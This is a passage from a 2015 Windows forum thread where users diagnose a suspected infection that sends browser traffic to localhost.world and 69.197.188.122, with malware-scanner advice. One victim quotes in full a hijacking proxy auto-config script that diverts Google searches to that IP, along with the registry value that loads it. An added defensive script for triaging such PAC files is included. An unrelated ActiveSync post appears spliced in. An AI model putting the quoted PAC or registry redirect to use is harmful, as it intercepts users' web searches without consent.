Windows 10: infection? outbound localhost.world to ip 69.197.188.122

Discussion in 'AntiVirus, Firewalls and System Security' started by Cixoos, Oct 23, 2015.

  1. Cixoos Win User

    infection? outbound localhost.world to ip 69.197.188.122


    Got an email from someone that reported an antimalware program was reporting outbound localhost.world to ip 69.197.188.122.

    The warning came when using browsers or some other programs that connected to the net, any idea what this is?

    :)
     
    Cixoos, Oct 23, 2015
    #1
  2. Falenone Win User

    Windows 10 auto enables "Use Proxy Script" after reboots

    Now I actually found out that something keeps changing this setting even when after startup I made sure it was disabled. What the **** is this thing...

    Edit

    After some research, I downloaded the localhost.world file, looked at what's inside and found this, which is kind of worrying:

    function FindProxyForURL(url, host) {
    ba = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ba.test(url)) { return "PROXY 69.197.188.122:8484" }
    bb = /^https?:\/\/www\.google\.[a-zA-Z.]+\/\?(.*)$/;if (bb.test(url)) { return "PROXY 69.197.188.122:8484" }
    bc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (bc.test(url)) { return "PROXY 69.197.188.122:8484" }
    bd = /^https?:\/\/www\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bd.test(url)) { return "PROXY 69.197.188.122:8484" }
    be = /^https?:\/\/www\.google\.[a-zA-Z.]+\/s\?(.*)$/;if (be.test(url)) { return "PROXY 69.197.188.122:8484" }
    bf = /^https?:\/\/cse\.google\.[a-zA-Z.]+\/cse\?(.*)$/;if (bf.test(url)) { return "PROXY 69.197.188.122:8484" }
    return "DIRECT";
    }

    Adwcleaner, Malwarebytes and ESET found nothing. MS Malicious removal thing didn't find anything either.

    After some more research, I'm not the only one facing that exact same problem with cmd window opening up and then chrome force closing.

    Also had this in registry which I removed

    [HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings] "AutoConfigURL"="http://localhost.world/localhost.host"

    Also had odd certificates. Some DO_NOT_TRUST_fiddlerroot, nope, no thanks, got rid of those as well.

    Going through task scheduler, don't see anything odd there disguised that kills chrome.exe or any other browser and updates the setting.

    Turns out I've had something going on here and now I'm left with picking up pieces because no AV found anything
     
    Falenone, Oct 23, 2015
    #2
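
Added example (not part of Falenone's post or of any tool named in this thread): a static check for a PAC file like the one quoted above, listing the proxy endpoints it names and which probe URLs its rules would divert. The function names, the probe URLs and the shortened two-rule sample PAC are constructed for illustration.

```javascript
// Added example: static triage of a proxy auto-config (PAC) script.
// The PAC text is treated as data and is never executed.

// Constructed sample: two rules in the shape of the PAC quoted in the post.
const SAMPLE_PAC = String.raw`function FindProxyForURL(url, host) {
ba = /^https?:\/\/www\.google\.[a-zA-Z.]+\/?$/;if (ba.test(url)) { return "PROXY 69.197.188.122:8484" }
bc = /^https?:\/\/www\.google\.[a-zA-Z.]+\/search\?(.*)$/;if (bc.test(url)) { return "PROXY 69.197.188.122:8484" }
return "DIRECT";
}`;

// Constructed probe URLs: two search-engine pages, two unrelated pages.
const PROBES = ["https://www.google.com/", "https://www.google.com/search?q=test",
  "https://www.google.com/maps", "https://example.org/"];

// Loopback and RFC 1918 ranges; hostnames return false and need manual review.
function isPrivateIPv4(host) {
  const m = /^(\d+)\.(\d+)\.\d+\.\d+$/.exec(host);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 10 || a === 127 || (a === 192 && b === 168) || (a === 172 && b >= 16 && b <= 31);
}

// Collect every endpoint named in return strings such as "PROXY host:port; DIRECT".
function extractProxies(pacText) {
  const re = /\b(?:PROXY|SOCKS[45]?|HTTPS?)\s+([A-Za-z0-9.-]+):(\d{1,5})/g;
  return [...new Set([...pacText.matchAll(re)].map(m => `${m[1]}:${m[2]}`))];
}

// Rebuild the regex literals assigned to variables (name = /.../flags;).
function extractUrlPatterns(pacText) {
  const re = /\w+\s*=\s*\/((?:\\.|[^\/\\\n])+)\/([a-z]*)\s*;/g;
  const out = [];
  for (const m of pacText.matchAll(re)) {
    // Drop g/y so .test() stays stateless; skip patterns that do not compile.
    try { out.push(new RegExp(m[1], m[2].replace(/[gy]/g, ""))); } catch (e) { /* skip */ }
  }
  return out;
}

// Flag a PAC that sends selected URLs through a proxy outside private address space.
function triagePac(pacText, probeUrls) {
  const proxies = extractProxies(pacText);
  const nonPrivate = proxies.filter(p => !isPrivateIPv4(p.split(":")[0]));
  const patterns = extractUrlPatterns(pacText);
  const intercepted = probeUrls.filter(u => patterns.some(re => re.test(u)));
  return { proxies, nonPrivate, ruleCount: patterns.length, intercepted,
           suspicious: nonPrivate.length > 0 && intercepted.length > 0 };
}
```

On the sample, `triagePac(SAMPLE_PAC, PROBES)` reports one non-private endpoint and two diverted probe URLs; a PAC that only names a private-range proxy is not flagged.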
  3. ActiveSync 4.5 and Kerio Personal Firewall and Asus P535

    I assume you followed the instructions about the inbound/outbound connections:



    1. Allow inbound/outbound connections on the following programs:

    wcescomm.exe (ActiveSync Application)

    WCESMgr.exe (Activesync Connection Manager)

    rapimgr.exe (ActiveSync RAPI Manager)

    CEAPPMGR.exe (This one shows up as Application Manager in Sunbelt)


    2. Open up TCP/IP port 26675 to inbound/outbound traffic.
     
    Linley Meslier, Oct 23, 2015
    #3
  4. simrick Win User

    Hi Cixoos.
    I think localhost.world is possibly a redirect from a botnet (possibly Zeroaccess rootkit). 69.197.188.122 is Wholesale Internet out of Kansas.

    If you think you have an infection or rootkit: Please download TDSSKiller and run it.

    What antivirus do you have on your system?
     
    simrick, Oct 23, 2015
    #4
  5. Cixoos Win User
    It was Malwarebytes that reported it, I found out.

    I have now tested the machine with eset antivirus, nothing.
    Then tdsskiller and nothing
    Then housecall online and nothing
    roguekiller- Deleted some registry entries, but nothing serious
    zhpcleaner, found some stuff and cleaned.

    Then I blocked the ip in eset firewall with popup notification. It says asus printer utilities are trying constant outbound to 69.197.188.122
     
    Cixoos, Oct 23, 2015
    #5
  6. simrick Win User
    That is the first time I've ever heard of this!

    Want to try one more thing?

    aswMBR
    aswMBR Download
     
    simrick, Oct 23, 2015
    #6
  7. Cixoos Win User
    Strange thing indeed: if 69.197.188.122 is blocked with firewall, it is impossible to log in to router on local ip 192.168.1.1.
     
    Cixoos, Oct 24, 2015
    #7
  8. simrick Win User

    Now I'm really confused....that makes no sense to me.
    If you unblock, and access router, can you check for firmware updates on it?
     
    simrick, Oct 24, 2015
    #8
  9. Tsidhu Win User
    I'm having this issue as well. I'm on my laptop with a clean install of Windows 10 and an unfortunate "accident" in which I had to go back to a restore point because I became infected with multiple rootkits and viruses.

    Malwarebytes keeps indicating it is blocking localhost.world at that same ip address listed above. I've run

    *Hijackthis
    *Hitman Pro
    *Emsisoft Emergency Kit

    I removed a few entries with Hijackthis related to BHO search stuff in ie, I've also reset both browsers, and other scanners didn't find anything of note, but I'm still getting the blocking notification.

    Eager to see what else you've found out!

    T.
     
    Tsidhu, Oct 24, 2015
    #9
  10. simrick Win User
    Hi Tsidhu and welcome to Tenforums.

    Please try TDSSKiller and aswMBR in my posts above and report back the results.
     
    simrick, Oct 24, 2015
    #10
  11. Cixoos Win User
    Are you using an asus router?
     
    Cixoos, Oct 24, 2015
    #11
  12. YOU
    You Win User
    I found a post on the Malwarebytes forum: "mb constant stopping 69.197.188.122, localhost.world - Website Blocking - Malwarebytes Forum". The person has a similar problem with the IP being blocked by Malwarebytes while it was attempting to go outbound, originating from different programs (including legitimate ones). He had an ASUS router (I'm not sure if that's where Cixoos is going with this). Then a Malwarebytes employee commented "The block is being removed." This may imply that it is a false positive, but the meaning is unclear. If your router is infected with fake firmware (ASUS specifically had a vulnerability in routers), you can usually fix it by resetting the router using a reset pin on the back of it, or unplugging it from the mains for a few minutes. Then, install the latest firmware from the manufacturer.
     
  13. YOU
    You Win User

    But try this first: Go to Network and Sharing Center -> Internet Options -> Connections -> LAN Settings. Uncheck "Automatically detect settings" and "Use automatic configuration script" and click OK. Then run Malwarebytes.
     